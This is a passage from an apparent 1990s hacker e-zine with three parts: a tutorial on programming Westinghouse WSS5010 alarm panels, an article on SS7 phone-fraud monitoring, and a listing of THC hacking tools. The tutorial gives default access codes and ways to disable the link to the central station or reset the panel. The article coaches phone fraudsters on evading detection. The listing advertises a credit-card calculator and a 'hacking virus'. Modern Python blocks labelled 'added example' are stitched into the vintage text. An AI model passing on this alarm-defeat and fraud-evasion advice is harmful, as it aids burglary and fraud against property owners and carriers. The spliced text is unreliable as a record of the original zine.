[16] 24 Hour Panic Zone
[17] 24 Hour Emergency Zone
[18] 24 Hour Sprinkler Zone
[19] 24 Hour Water Flow Zone
[20] 24 Hour Freezer Zone
[21] 24 Hour Latching Tamper - "If this zone is violated, the
installer must enter Installer Programming before the
panel to be armed."
[22] Momentary Keyswitch Arm Zone - "Momentarily violation of
this zone will alternatively arm/disarm the system."
[23] Maintained Keyswitch Arm Zone - Disarms and rearms system
as a toggle upon violation and securing.
[24] LINKS Answer Zone - Downloads through LINKS 1000 cellular
communicator.
The zone attributes are pretty straightforward. Alarm output can
be Audible vs. Silent, Pulsed vs. Steady. The zone can Activate Chime,
Bypass Enable, or Transmission Delay Enable. Furthermore, the WSS5010 has
Swinger Shutdown Enable. As Westinghouse says, "Determines if the panel
will shut down the communicator for the zone after the swinger limit is
reached." What this means is if you invite enough swingers to your party,
the panel will automatically disable the phone lines so you aren't
disturbed.
The sections for zone attributes:
Zones 1 to 32 Attributes {101} - {132}
Audible/Silent Alarm {101} - {132} Option 1
Pulsed/Steady Alarm {101} - {132} Option 2
Activate Chime {101} - {132} Option 3
Bypass Enable {101} - {132} Option 4
Swinger Shutdown Enable {101} - {132} Option 6
Transmission Delay Enable {101} - {132} Option 7
7. THE COMMUNICATOR
The Communicator is Westinghouse's general name for the method of
talking to the central station. Valid communicators are normal phone
lines, the LINKS 1000 cellular communicator, and perhaps other devices.
Here are the section numbers for Installer Programming for the
Communicator; take note of Communicator Disable.
Pulse Dialing {380 Option 3}
Switch to Pulse Dial {380 Option 4}
Post Dial Wait for Handshake {161}
Maximum Dialing Attempts {160}
Communicator Disable {380 Option 1}
The panel, as noted above, can store three different phone numbers
for communication to the central station. These phone numbers can be up
to thirty-two digits, which is just big enough to enter your credit card
onto a 1-800 phone sex line. Fortunately Westinghouse has a contingency
plan in its Alternate Dial option.
1st Phone Number {301}
2nd Phone Number {302}
3rd Phone Number {303}
3rd Phone Number Enabled {308 Option 5}
Alternate Dial {380 Option 6}
The central stations know which panel is calling through the
System Identifier Code.
System Identifier Code {310}
The communicator communicates with the central station using the
SIA or pager formats. SIA uses tones rather than pulses to transfer its
information which makes it faster. Here is a typical communication:
N Ri01 BA 01
It's a "N" new event from system "Ri01," reporting a "BA" burglary
alarm in Zone 01.
Pager format, on the other hand, uses DTMF tones to page users.
To extend possibilities here are the hex-dtmf equivalents:
0xB {*}
0xC {#}
0xD Forces panel to search for dial tone
0xE Two-second pause
0xF End of phone number marker ('\0')
Pager format can't be used on the LINKS 1000 cellular communicator.
Here are some related sections:
Communicator format {360}
SIA Sends Automatic Reporting Codes {381 Option 3}
Communicator Call Direction Options {361} to {368}
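As an added example (not Westinghouse's code and not from the manuals), here is a small Python parser for the two communicator encodings described above: the SIA event line as the article lays it out, and a stored phone-number field with the 0xB-0xF control nibbles. The four-field layout and the code names are assumptions taken from the article's single sample message; real SIA reports carry more than this.

```python
"""Parsers for the two communicator encodings the article describes.
Added example, not Westinghouse code.  The SIA field layout is assumed
from the article's one sample ("N Ri01 BA 01"); the phone-number nibble
meanings are the ones listed in the article."""

# Qualifier and event codes as the article spells them out.  Only the codes
# the article names are given meanings; anything else passes through raw.
SIA_QUALIFIERS = {"N": "new event"}
SIA_EVENT_CODES = {"BA": "burglary alarm"}

# Hex nibbles 0xB-0xF have special meaning inside a stored phone number.
DIAL_CONTROL = {
    "B": "*",
    "C": "#",
    "D": "<search for dial tone>",
    "E": "<pause 2s>",
}


def parse_sia_event(line):
    """Split 'N Ri01 BA 01' into qualifier, system id, event code and zone.

    Returns a dict; raises ValueError on anything that does not have the
    four whitespace-separated fields the article shows."""
    parts = line.split()
    if len(parts) != 4:
        raise ValueError("expected 4 fields, got %d: %r" % (len(parts), line))
    qualifier, system_id, event_code, zone = parts
    if not zone.isdigit():
        raise ValueError("zone must be numeric: %r" % zone)
    return {
        "qualifier": qualifier,
        "qualifier_meaning": SIA_QUALIFIERS.get(qualifier, "unknown"),
        "system_id": system_id,
        "event_code": event_code,
        "event_meaning": SIA_EVENT_CODES.get(event_code, "unknown"),
        "zone": int(zone),
    }


def decode_phone_field(nibbles):
    """Turn a stored phone-number field (a string of hex digits, at most 32)
    into the list of actions the panel would take when dialing.

    Decoding stops at the first 0xF end marker.  A field with no marker is
    rejected, since the panel would otherwise read to the end of the buffer."""
    nibbles = nibbles.upper()
    if len(nibbles) > 32:
        raise ValueError("phone field is limited to 32 nibbles")
    actions = []
    for ch in nibbles:
        if ch == "F":
            return actions
        if ch in DIAL_CONTROL:
            actions.append(DIAL_CONTROL[ch])
        elif ch in "0123456789":
            actions.append(ch)
        else:
            raise ValueError("not a hex nibble: %r" % ch)
    raise ValueError("no 0xF end-of-number marker")


def dial_string(nibbles):
    """Readable rendering of decode_phone_field: digits and DTMF symbols run
    together, control actions shown in angle brackets."""
    return "".join(decode_phone_field(nibbles))


if __name__ == "__main__":
    # Constructed samples: the article's own event line, and a phone field
    # built around the 1-800 number quoted elsewhere in this issue.
    print(parse_sia_event("N Ri01 BA 01"))
    print(dial_string("D18005551212EEF"))
```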
Another important issue in the communicator is the configuration
of the Telephone Line Monitor (TLM). When TLM Enabled {015 Option 7} is
on, the panel will monitor the phone line, making sure it hasn't been
snipped. If TLM Trouble Only or Audible When Armed {015 Option 8} is on,
the keypads will make an alarm tone when trouble occurs. If a LINKS 1000
exists on the system, the TLM Trouble Reporting Code {350} will be sent to
the central station.
8. DOWNLOADING
Forcing the WSS5010 to download is a difficult procedure. The
panel will listen to one or two rings, miss a ring, and start a timer. If
another ring is heard before the Answering Machine Double Call Timer {405}
expires, it will answer the first ring of the second call. If Call Back
{401 Option 3} is enabled, the panel will hang up and call the Download
Computer Telephone Number {402}. If User Enable DLS Window {401 Option 2}
is enabled, {*}{6} will activate downloading for six hours. The only
other way to make the WSS5010 answer is by removing and re-applying power
to the panel. Some other things to jot down if you're planning to
download are the Download Access Code {403} (by default 5010) and the
Panel Identifier Code {404} (by default 5010). If LINKS 1000 *and* Call
Back are being used, also check the LINKS 1000 Preamble (Downloading)
{490}.
9. DEFAULTING THE SYSTEM
Defaulting the panels and modules of the WSS5010 system is easy.
To default the main panel (hardware), remove AC and battery power from the
panel and remove all wires from the Zone 1 and PGM 1 terminals. With a
piece of wire, short the Zone 1 terminal to the PGM1 terminal. Apply AC
power to the main panel. When the Zone Light 1 is lit on the keypad, the
default is complete. Remove AC power from the control and reconnect all
original wiring. Power up the control.
To default the modules and panel (software), this is the recipe:
1. Get into Installer Programming.
2. Enter Program Section.
3. Enter the Installer Code.
4. Enter the Program Section again.
The Program Sections are:
Main panel (software) {999}
WSS5580 {995}
WSS5132-900 Wireless {996}
WSS5400 On-Site Printer {997}
WSS5908 Audio Interface {998}
It's possible that Installer Lockout has been turned on, which
means a hardware default can't be performed. If so, follow the above
recipe with {991}. To re-enable Installer Lockout, use {990}.
There's really no reason to default the panel through software or
any of the modules. With the Installer Code, you can do whatever you
want, but if you don't have it and it's not 5010, a hardware default could
be useful.
10. FINAL NOTES
I hope you have enjoyed this tutorial.
APPENDICES
A. GLOSSARY
Event buffer:
A memory of previous events. The WSS5010 can store 128 entries.
Function key:
Keypads have five function keys, one for each of five commands:
stay arm, away arm, door chime toggle, smoke detector reset, and quick
exit. A key must be held down for two seconds to be used.
KEYBUS:
The four-wire cable between the panel and the modules.
Module:
All keypads, zone expanders, and output boards are considered
modules.
Programmable outputs:
Voltage outputs which activate on various system conditions.
Programmable outputs can be used to drive devices, too.
B. TROUBLE CONDITIONS
These are the WSS5010 trouble conditions:
[1] Service Required
[2] AC Failure
[3] Telephone Line Trouble
[4] Failure to Communicate
[5] Zone Fault (including Fire Zone)
[6] Zone Tamper
[7] Zone Low Battery
[8] Loss of System Time
C. REPORTING CODE SECTIONS
Zone Alarm Reporting Code {320 to 323}
Restoral on Bell Timeout {380 Option 2}
Zone Restoral Reporting Code {324 to 327}
Closing Reporting Code {339 to 342}
Partial Closing Reporting Code {343}
Special Closing Reporting Code {343}
Closing by Duress Code Reporting Code {343}
Recent Closing Reporting Code {328}
Opening Reporting Code {344 to 347}
Special Opening Reporting Code {348}
Opening After Alarm Reporting Code {328}
Opening by Duress Reporting Code {348}
Zone Tamper Alarm Reporting Code {330 to 333}
Zone Tamper Restoral Reporting Code {334 to 337}
General System Tamper Reporting Code {338}
General System Tamper Restoral Reporting Code {338}
Keypad Fire Alarm Reporting Code {329}
Keypad Fire Restoral Reporting Code {329}
Keypad Auxiliary Alarm Reporting Code {329}
Keypad Auxiliary Restoral Reporting Code {329}
Keypad Panic Alarm Reporting Code {329}
Keypad Panic Restoral Reporting Code {329}
Duress Reporting Code {328}
Two Wire Smoke Alarm Reporting Code {329}
Two Wire Smoke Alarm Restoral Reporting Code {329}
Battery Trouble Alarm Reporting Code {349}
Battery Trouble Restoral Reporting Code {350}
AC Failure Trouble Alarm Reporting Code {349}
AC Failure Communication Delay {370}
AC Failure Trouble Restoral Reporting Code {350}
Bell Circuit Trouble Alarm Reporting Code {349}
Bell Circuit Trouble Restoral Reporting Code {350}
Fire Trouble Alarm Reporting Code {349}
Fire Trouble Restoral Reporting Code {350}
Auxiliary Power Supply Trouble Alarm Reporting Code {349}
Auxiliary Power Supply Trouble Restoral Reporting Code {350}
TLM Trouble Reporting Code {349}
TLM Trouble Delay {370}
TLM Restoral Reporting Code {350}
General System Trouble Reporting Code {349}
General System Trouble Restoral Reporting Code {350}
General System Supervisory Trouble Reporting Code {349}
General System Supervisory Trouble Restoral Reporting Code {350}
Zone Expander Supervisory Trouble Reporting Code {328}
Zone Expander Supervisory Restoral Reporting Code {328}
Periodic Test Transmission Reporting Code {352}
System Test Reporting Code {352}
LINKS 1000 Test Transmission Restoral Code {352}
General Zone Low Battery Alarm Reporting Code {353}
Keypad Lockout Reporting Code {338}
DLS Lead In Reporting Code {351}
DLS Trail Out Reporting Code {351}
Phone Number 1 Failure to Communicate Reporting Code {351}
Phone Number 2 Failure to Communicate Reporting Code {351}
Event Buffer 75% Full Reporting Code {351}
D. SIA Reporting Codes
Reporting codes have a pattern to them. An "A" suffix indicates
an alarm while an "H" indicates a restoration, and many of the different
alarms have the same codes. Furthermore, many use "XX" to indicate to the
central station which zone has been violated or secured. This information
can be used to translate errors from or into SIA format.
The following use BA-XX / BH-XX:
o Delay Zone
o Instant Zone
o Interior Zone
o Delay HA Zone
o Interior HA Zone
o 24 Hr Burg Zone
o 24 Hr Latching Tamper
The following use FA-XX / FH-XX:
o Standard Fire Zone
o Delayed Fire Zone
The following use UA-XX / UH-XX:
o 24 Hr Supervisory Buzzer
o 24 Hr Supervisory Zone
GA-XX / GH-XX: 24 Hr Gas Zone
KA-XX / KH-XX: 24 Hr Heat Zone
MA-XX / MH-XX: 24 Hr Medical Zone
PA-XX / PH-XX: 24 Hr Panic Zone
QA-XX / QH-XX: 24 Hr Emergency Zone
SA-XX / SH-XX: 24 Hr Sprinkler Zone
WA-XX / WH-XX: 24 Hr Water Zone
ZA-XX / ZH-XX: 24 Hr Freeze Zone
TA-XX: Zone Tamper
TR-XX: Zone Tamper Restoral
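As an added example (not code from the tutorial or from any panel or central
station vendor), here is a decoder for the SIA transmission shown in the
communicator section together with the code families of this appendix: it
splits a message such as "N Ri01 BA 01" into its four fields, translates the
code with the A/H suffix rule, and keeps malformed lines and unknown codes
visible to the operator instead of dropping them. The whitespace-separated
field layout, the handling of "TR", the event flag table (only "N" is
described in the text) and the sample log are assumptions drawn from the text.

```python
"""Decoder for the SIA-format event strings described in this tutorial.

Added example, not code from the tutorial or from any panel or central
station vendor. It assumes the four whitespace-separated fields of the
sample transmission "N Ri01 BA 01" (event flag, system identifier,
reporting code, zone) and takes the code families from Appendix D.
"""
import re
from dataclasses import dataclass

# Appendix D: first letter of the code is the event class, second is A (alarm)
# or H (restoral); TR-XX is the one R-suffixed code, the zone tamper restoral.
EVENT_CLASS = {
    "B": "burglary", "F": "fire", "U": "24 hr supervisory", "G": "24 hr gas",
    "K": "24 hr heat", "M": "24 hr medical", "P": "24 hr panic",
    "Q": "24 hr emergency", "S": "24 hr sprinkler", "W": "24 hr water",
    "Z": "24 hr freeze", "T": "zone tamper",
}
SUFFIX = {"A": "alarm", "H": "restoral"}
EVENT_FLAG = {"N": "new event"}          # only "N" is described in the text
_ZONE = re.compile(r"^\d{2}$")           # zones are sent as two digits ("XX")

@dataclass(frozen=True)
class SiaEvent:
    system_id: str
    code: str
    zone: int
    description: str
    recognised: bool      # False = valid shape but a code not in Appendix D

def decode_sia(message):
    """Parse one transmission; raises ValueError when the shape is wrong."""
    parts = message.split()
    if len(parts) != 4:
        raise ValueError(f"expected 4 fields, got {len(parts)}: {message!r}")
    flag, system_id, code, zone = parts
    if flag not in EVENT_FLAG:
        raise ValueError(f"unknown event flag {flag!r}")
    if len(code) != 2 or not code.isalpha():
        raise ValueError(f"reporting code must be two letters, got {code!r}")
    if not _ZONE.match(zone):
        raise ValueError(f"zone must be two digits, got {zone!r}")
    code = code.upper()
    if code == "TR":
        cls, kind = "zone tamper", "restoral"
    else:
        cls, kind = EVENT_CLASS.get(code[0]), SUFFIX.get(code[1])
    recognised = cls is not None and kind is not None
    if recognised:
        desc = f"{EVENT_FLAG[flag]}: {cls} {kind} in zone {zone}"
    else:
        # Keep the event visible to the operator rather than dropping it silently.
        desc = f"{EVENT_FLAG[flag]}: unrecognised code {code} in zone {zone}"
    return SiaEvent(system_id, code, int(zone), desc, recognised)

def decode_log(lines):
    """Decode a batch; malformed lines are returned separately for review."""
    events, rejected = [], []
    for line in lines:
        try:
            events.append(decode_sia(line))
        except ValueError as err:
            rejected.append((line, str(err)))
    return events, rejected

# Constructed sample traffic; "XA" and the last two lines are deliberately bad.
SAMPLE_LOG = [
    "N Ri01 BA 01",   # the tutorial's own example
    "N Ri01 BH 01",
    "N Ri01 FA 03",
    "N Ri01 TA 05",
    "N Ri01 TR 05",
    "N Ri01 XA 02",
    "N Ri01 BA 1",
    "O Ri01 BA 01",
]

if __name__ == "__main__":
    ok, bad = decode_log(SAMPLE_LOG)
    for ev in ok:
        print(ev.system_id, ev.code, ev.description)
    for line, why in bad:
        print("REJECTED", repr(line), why)
```

The split between "rejected" (wrong shape) and "unrecognised" (right shape,
unknown code) matters on the receiving side: a code the central station does
not know is still an event from a real system identifier and should reach an
operator, while a line that does not parse at all is better logged for review
than guessed at.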
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change Presents
CCiTT #7 Monitoring
by
van Hauser
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CCiTT #7 Monitoring
The information presented here is based on data retrieved from :
o Hewlett Packard - USA
o Deutsche Telekom - Germany
o Bell & Bellcore (Bell Communication Research) - USA
o Mercury Communications - United Kingdom
What is CCiTT #7
------------------
CCiTT #7 is the newest signaling system; it is also called SS7 (or Common
Channel Signaling System No.7). It uses two channels for communication.
The first is the voice channel (or whatever you are transmitting over it)
and the second is the data channel. This data channel is completely separated
from the voice channel, holds all the call information, and carries the
advanced features of caller ID, call forwarding, conference calling,
credit card calls, collect calls etc.
This extra data channel was put in after CCiTT #6 because, 1st, it disables
the "famous" blueboxing possibility, 2nd, it enhances line quality, and 3rd,
it expands the possibilities for new features like caller ID etc.
It is used in nearly all western European countries and North America, but now
more and more other countries are changing to this system as well, like Israel
for example.
Monitoring Systems for CCiTT #7
-------------------------------
As far as I know the following Monitoring Systems are in existence and
available for telecommunication companies :
o Bellcore : Davin and NetMavin
o Hewlett Packard : HP E4250A, also known as acceSS 7
o Unisys : NIRIS Information Platform
o Algen : Probe
I won't discuss Unisys and Algen here because they are not used by the
big companies and there is not much data around for them.
So I'll first present some short data about Bellcore's monitoring system,
which is only for the sake of completeness, and then focus on hardware,
software and history of HP's acceSS 7 in its own chapter.
o Bellcore's monitoring system is based on unix and is programmed in C using
the X11 Unix Window System, but it can also be run on vt100 terminals and soon
on Macintoshes too. It can run on any workstation which is Unix compatible.
It also has the ability to work with data from other Monitoring Systems like
acceSS 7 from HP, and can also use the C libraries from HP's system.
It's easy to use: mouse support, windowed real-time graphic display, zooming.
Interesting options are for example :
Monitoring calls from a specific telephone number
Automatic Fraud Detection
Multiple simultaneous call traces (up to 100)
Bellcore's Davin and NetMavin are used by Bell and Mercury Telecommunication.
HP's acceSS7 CCiTT #7 Monitoring System
---------------------------------------
o A bit of history :
This monitoring system, made by Hewlett Packard, became the No. 1
monitoring system on the telecommunication market.
In its beginning it was only for fault and performance analysis, but
then the engineers saw the prospective possibilities and enhanced it.
Its first big success was in October '95 when Deutsche Telekom, Germany's
only phone company, announced the first installation of this new device
in Europe. Later New Zealand's Telecom, Finland's Finnet group
(January '96), Israel's Bezeq (May '96) and Bell USA (June '96) were the
major phone companies which installed the acceSS 7 device.
In May '95 10 of the world's 30 biggest phone companies used acceSS7; now
(November '96) 20 of those 30 use it.
Even British Telecom, TeleWest, GTE and AT&T Wireless are now using
parts of the acceSS 7 system.
Or as HP put it : "We estimate that more than 90 percent of the CCiTT #7
links that are being monitored are being monitored by
our system."
In June '96 Hewlett Packard announced the new Fraud Management Toolkit.
It got its first hard-core testing by BellSouth at the Olympics in
Atlanta with an outstanding result.
They also founded the "Alliance to Outfox Phone Fraud", where now more
than 12 big phone companies are working together on strategies
to fight phone fraud.
The success of acceSS7 lies in its general and flexible design, especially
in contrast to Bellcore's monitoring system, which is pretty focused
on Bellcore and Mercury standards and equipment.
It can link into any CCiTT #7 based link, and HP also guarantees an
installation time of 3 months maximum and is willing to configure
everything to the customer's needs.
o The Hardware :
HP's main package is four 8-way symmetric multiprocessing (SMP)
HP 9000 Model T500 Corporate Business Servers for one link.
Each of those machines can handle up to 800 calls at once.
In August '96 an MS-DOS based implementation was announced; I don't know
if it's available by now.
o The Software :
They are running HP-UX, the unix operating system of HP, based
on Sys V 4.0 by AT&T, and using the HP-UX OpenView X-Window system.
Everything is programmed in C, and the libraries are part of the installation.
The customer can use those libraries to write applets and scripts of
their own to meet their needs. HP also has a service team and offers
training for that.
The basis of the software is the data collection kit, which generates a
"call detail record" (CDR) for every call.
This record can then be used by applets written by HP or the company
to extract any statistical data they want.
HP offers such toolkits for billing, billing-control, traffic-control and
of course fraud detection.
Of course Fraud Detection is not the main point of CCiTT #7 Monitoring.
Originally its goal was fault and performance analysis, but then they
found out that the data gathered could be used for nearly anything.
So today it's more about gathering traffic statistics for network planning,
optimizing, error controlling & detecting, and market decisions - but
fraud detection is an important part. And it's the information about this
detection system which could be interesting for you, so here's the
description :
o The Fraud Detection Toolkit :
The Automatic Fraud Detection is based on pattern matching and scenarios.
Patterns must first be measured for each communication network/area.
Scenarios are known patterns of fraud types.
Everything which is out of the normal pattern or fits into a scenario
triggers an alarm.
Out-of-pattern conditions are :
calls of long duration
repeated calls to a particular dialed number from the same area of origin
repeated calls from the same area of origin to different numbers
long/many calls from an un-billable number
dialing special numbers
dialing many toll free numbers
Some scenarios include :
calls to high fraud destinations
suspicious use of call forwarding
many long distance calls from one origin
many calls, especially LD calls, from a public phone
A triggered alarm gets a priority and is shown on the screen of an
operator of the company's Customer Service Center. If a number continues
to be out of pattern or fits into a scenario it will get a higher priority.
According to the priority the operator can select actions like tracing,
disconnecting, monitoring the origin number and more.
Note that there is an exception list of known legitimate users/companies!
 XXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXX \
 XXXXXXXXXXXXXXXX  \                          \
 XXXXXXXXXXXXXXXX   \  Out-of-                 \  Continues
 XXXXXXXXXXXXXXXX    - Pattern/  --> XXXXXXXX   - Out-of-Pattern    --> XX
 XXXXXXXXXXXXXXXX    / Scenario      XXXXXXXX   / or Scenario
 XXXXXXXXXXXXXXXX   /                          /  or Manual
 XXXXXXXXXXXXXXXX  /                              Investigation
 XXXXXXXXXXXXXXXX /
 XXXXXXXXXXXXXXXX

 Calls going        Monitoring      Alarms of      Continued            FRAUD
 through the        system          the monitoring out-of-pattern       CASES
 monitoring system  analyzing       system         or scenario, or
                                                   manual investigation
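As an added example (not HP's Fraud Management Toolkit or any vendor's code,
and not part of van Hauser's article), here is a small rule engine that runs
the out-of-pattern checks and scenarios listed above over constructed call
detail records, gives each alarm a priority, raises the priority of a subject
that is still out of pattern in a later batch, and honours an exception list.
The CDR fields, every threshold, the "HF" high-fraud destination code, the
exception entry and the priority-to-action mapping are all assumptions; the
article only says that patterns must be measured per network/area first.

```python
"""Out-of-pattern and scenario checks over call detail records (CDRs).
Added example, not HP's Fraud Management Toolkit or any vendor's code. It
assumes a minimal CDR shape and illustrative thresholds; as the article
says, real patterns must first be measured per network/area."""
from collections import Counter, defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class CDR:
    origin: str                # calling number
    origin_area: str           # area/exchange the call came from
    dialed: str                # called number
    duration_s: int
    dest_country: str = "DE"   # "DE" is the assumed home network
    toll_free: bool = False
    billable: bool = True
    public_phone: bool = False
    forwarded: bool = False

@dataclass
class Alarm:
    subject: str               # a calling number or "area:<area>"
    priority: int
    reasons: list

HOME_COUNTRY = "DE"
# Thresholds are assumed for illustration, not measured patterns.
LONG_CALL_S, MANY_CALLS, REPEAT_TO_SAME, REPEAT_FROM_AREA = 3600, 5, 3, 5
MANY_TOLL_FREE, MANY_LD, MANY_FROM_PUBLIC, MANY_FORWARDED = 4, 3, 3, 2
HIGH_FRAUD_DESTINATIONS = {"HF"}   # placeholder country code, not a real list
EXCEPTIONS = {"+4969000001"}       # constructed: known legitimate heavy caller

def find_out_of_pattern(cdrs):
    """Map each subject to the set of out-of-pattern / scenario rules it triggered."""
    cdrs = [c for c in cdrs if c.origin not in EXCEPTIONS]   # exception list first
    findings, by_origin = defaultdict(set), defaultdict(list)
    for c in cdrs:
        by_origin[c.origin].append(c)
    for origin, calls in by_origin.items():
        hit = findings[origin].add
        unbillable = [c for c in calls if not c.billable]
        if any(c.duration_s >= LONG_CALL_S for c in calls):
            hit("call of long duration")
        if len(unbillable) >= MANY_CALLS or any(c.duration_s >= LONG_CALL_S for c in unbillable):
            hit("long/many calls from an un-billable number")
        if sum(c.toll_free for c in calls) >= MANY_TOLL_FREE:
            hit("many toll free numbers dialed")
        if any(c.dest_country in HIGH_FRAUD_DESTINATIONS for c in calls):
            hit("scenario: call to high fraud destination")
        if sum(c.forwarded for c in calls) >= MANY_FORWARDED:
            hit("scenario: suspicious use of call forwarding")
        if sum(c.dest_country != HOME_COUNTRY for c in calls) >= MANY_LD:
            hit("scenario: many long distance calls from one origin")
        if any(c.public_phone for c in calls) and len(calls) >= MANY_FROM_PUBLIC:
            hit("scenario: many calls from a public phone")
    # Area-level patterns: same area to one number, and same area to many numbers.
    for (area, dialed), n in Counter((c.origin_area, c.dialed) for c in cdrs).items():
        if n >= REPEAT_TO_SAME:
            findings["area:" + area].add(f"repeated calls to {dialed} from the same area")
    distinct = defaultdict(set)
    for c in cdrs:
        distinct[c.origin_area].add(c.dialed)
    for area, numbers in distinct.items():
        if len(numbers) >= REPEAT_FROM_AREA:
            findings["area:" + area].add("repeated calls from the same area to different numbers")
    return {s: r for s, r in findings.items() if r}

def prioritise(findings, previous=None):
    """One point per rule hit; a subject still alarming keeps its earlier priority on top."""
    previous = previous or {}
    return {s: Alarm(s, len(r) + previous.get(s, 0), sorted(r)) for s, r in findings.items()}

def suggested_action(priority):
    """Assumed mapping from priority to the operator actions the article names."""
    if priority >= 4:
        return "disconnect"
    return "trace" if priority >= 2 else "monitor origin number"

# Constructed sample traffic. Batch 1 exercises most rules; batch 2 shows escalation.
BATCH1 = (
    [CDR("+4969000001", "069", "+12125550100", 7200, "US")] * 3   # excepted customer
    + [CDR("+4969555123", "069", "+12125550100", 7200, "US")] * 3 # long, repeated LD calls
    + [CDR("+4930777000", "030", f"+99000{i}", 300, "HF", public_phone=True) for i in range(4)]
    + [CDR("+4989111222", "089", "+4989333444", 5400, billable=False)]
    + [CDR("+4940123456", "040", f"+49800{i}", 60, toll_free=True) for i in range(4)]
    + [CDR("+4969888999", "069", "+4969111000", 120)]               # ordinary caller
)
BATCH2 = [CDR("+4969555123", "069", "+12125550100", 7200, "US")] * 3

if __name__ == "__main__":
    first = prioritise(find_out_of_pattern(BATCH1))
    second = prioritise(find_out_of_pattern(BATCH2), {s: a.priority for s, a in first.items()})
    for alarms in (first, second):
        for a in sorted(alarms.values(), key=lambda a: -a.priority):
            print(a.priority, a.subject, suggested_action(a.priority), a.reasons)
        print("--")
```

Two design points carry over from the article: the exception list is applied
before any rule runs, so a known heavy caller never contributes to area-level
counts either, and the priority carried from one batch to the next is what
turns a repeat offender into the "continued out-of-pattern" case the diagram
shows feeding the fraud cases.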
o Where are the installations of HP's acceSS 7 systems?
I know only a few, so here we go. Read the final words on why that might
be interesting to know :)
Deutsche Telekom Germany :
Links in Frankfurt, Duesseldorf, Stuttgart and Nuernberg
Control Centers in Frankfurt and Bamberg.
Bell USA : Control Center in Philadelphia, another should be in Atlanta
Bezeq Israel : 21 links on key network hubs
Control Center in Tel Aviv
FINAL WORDS
-----------
Some information in this article was previously published in the
THC Magazine #1 (February '96). I updated the information, wrote many
things in more detail and found out much more about the system, so this
article grew by 100% - that it is still 10 kb long (or better to say "short")
shows the lack of information going around. I obtained some sensitive data
and press releases and wrote them all into this concentrated article.
Note that the system from HP runs on HP-UX. And for example in Germany,
all Deutsche Telekom unix servers are connected (of course with firewalls)
and also have gateways to the internet (of course also firewalled).
But for Hackers, HP stands for Hopeless Problems in regard to security.
There are enough bugs in the software to penetrate any HP-UX server and I
know that even the HP center in Palo Alto got hacked several times.
Maybe it's possible for the really elite hackers to penetrate the systems
(which I won't hope for them - of course! - *grin*) - so watch out ...
It is very important that you - if you are doing phone fraud - are aware
of this system. Since the installation of the acceSS 7 here in Germany
about 50 guys got busted for blueboxing, and our Telekom has just reported
the biggest fraudsters to the police. If you are living in Germany and have
a digital line then stop blueboxing immediately! Even before this system
our Telekom logged everything to fraud sensitive numbers! From the data
of a busted friend we can see that the beginning of the monitoring records is
dated May '95 and he was busted October '96 ... If you blueboxed a lot
during that period then encrypt your data and keep a low profile!
These words are targeted mainly at German readers, but everybody doing phone
fraud via a phone company which uses acceSS 7 will get into deep trouble soon
if he does the fraud extensively.
Have fun guys, don't get caught ...
van Hauser (vh@campus.de & vh@insecurity.org)
Type Bits/KeyID Date User ID
pub 1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
=nX2w
-----END PGP PUBLIC KEY BLOCK-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change presents
Reviews and Miscellany
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This is a new section which will appear in all future installments of this
magazine. This issue contains some information about the THC hacking
utilities.
--------------------------
THC - The Hacker's Choice
THC was founded in October '95 and made it in only one year into the top
hacking/phreaking groups of the world.
It is currently working together with UCF and UPG on unix and telecom
hacking, plus information exchange and distribution.
The most successful tools of THC include :
THC-SCAN v1.0 - a tone and carrier scanner which replaces the old
Toneloc with many more and new options
LOGIN HACKER v1.1 - the first flexible script language based hacking
tool ever to be in existence
T-CRED v1.9 - our successful competitor for credit card calculation
which makes time hard for the Credit Master v4
RA BBS HACKING TOOLS #1 + #2
- wonderful tools, including a hacking virus,
to hack a Remote Access BBS
GENERAL DIALER v1.0 - the only bluebox dialer which works with the
GUS soundcard (and only with the GUS ;)
THC-MAGAZINE #1 + #2 - The magazines of THC, with themes about
blueboxing, hardware, hacking, virii and anarchy.
... plus about 5 smaller releases.
Global Distribution Sites
----------------------+----------------+------------+-------------
BOARD NAME | AC/NUMBER | COUNTRY | SYSOP
----------------------+----------------+------------+-------------
L.o.r.E BBS [HQ] | +49-69-823282 | GERMANY | van Hauser
| | Login:THC | Passwd:THC
ARRESTED DEVELOPMENT | +31-77-3547477 | HOLLAND | OMEGA
ViRUS POLYTECHNiQUES | +27-1-1953-5414| S. AFRiCA | RADiX
TWiLiGHT ZONE | +54-768-8639 | ARGENTiNA | CARNiVORO
RUNESTONE | +1-203-585-9638| USA | MERCENARY
UNDERWORLD_1996.COM | +1-514-683-1894| CANADA | RATPACK
PHREAK ASYLUM | +1-905-823-5532| CANADA | NETHAKD
---------------+------+----------------+------------+-+-----------
SiTE TYPE | iNET ADDRESS | COMMENT
---------------+--------------------------------------+-----------
WORLD WiDE WEB| http://www.insecurity.org |by:Celtic
WORLD WiDE WEB| http://www.paranoia.com/pub/zines/THC|by:KevinX
---------------+--------------------------------------+-----------
FTP SiTE | ftp://ftp.insecurity.org |by:Celtic
FTP SiTE | ftp://ftp.paranoia.com /pub/zines/THC|by:KevinX
---------------+--------------------------------------+-----------
There are about 5 more sites, but they aren't public yet because
they are still being tested for stability.
To contact write to vh@campus.de or vh@insecurity.org
Type Bits/KeyID Date User ID
pub 1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: Requires PGP version 2.6.x or later!
=nX2w
-----END PGP PUBLIC KEY BLOCK-----
------------------------------------------------------------------------------
COMING EASTER WEEKEND 1997 TO THE LAKEWOOD SHERATON IN COLORADO
--+ BUNNYCON '97 +--
(Stay tuned for more details)